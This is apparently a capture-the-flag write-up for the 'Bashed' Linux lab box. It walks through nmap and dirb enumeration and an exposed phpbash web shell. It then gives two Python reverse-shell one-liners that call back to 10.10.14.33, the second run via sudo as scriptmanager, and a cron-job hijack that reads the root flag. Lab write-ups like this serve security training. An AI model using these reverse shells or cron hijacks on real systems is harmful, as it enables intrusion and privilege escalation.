Summary

Bashed is an easy Linux box that can be exploited by discovering a php web shell named ‘phpbash.php’ on the webserver. Privileges can be escalated with by exploiting a cronjob that is running as root.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.24.131

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

The first thing I checked was the webserver. The user is presented with the following:

Checked the source code with ctrl + u but found nothing relevant so I started a directory brute-force with the following command:

dirb http://10.129.24.92

This gives the following results:

/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)  

Each of these directories were bruteforced individually and it was found that the dev directory contains a directory indexing vulnerability. So, you can simply navigate to: 10.129.24.131/dev/ and see that there are two files. Both, are a webshell from where you can execute commands on the server.


Exploitation

To obtain a reverse shell the following payload was used from pentest monkey:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This is a python reverse shell. This will open a shell for the www-data user. By navigating to the home directory you will see a user named arrexel, which has the user.txt in it.


Privilege Escalation

Next up is trying to escalate privileges to root. By checking sudo -l the result was as follows:

	$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

The root directory contains a directory called scripts. However, this was only accessible by the user scriptmanager. For simplicity reasons, a new python reverse shell was executed FROM the scriptmanager user (because www-data can run commands as scriptmanager) like shown below:

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Notice the first part of this command which makes it execute it as the scriptmanager user. This will give you a reverse shell as scriptmanager. Now you can enter the scripts directory and you will find two files. One python file that is being run as a cronjob by root (notice the timestamp) and a text file with root permissions. At this point it is pretty obvious you can replace the test.py file with something like this:

import os
os.system("cat /root/root.txt > powned.txt")

After this you have to wait a minute and you will find a newly created text file powned.txt containing the root flag.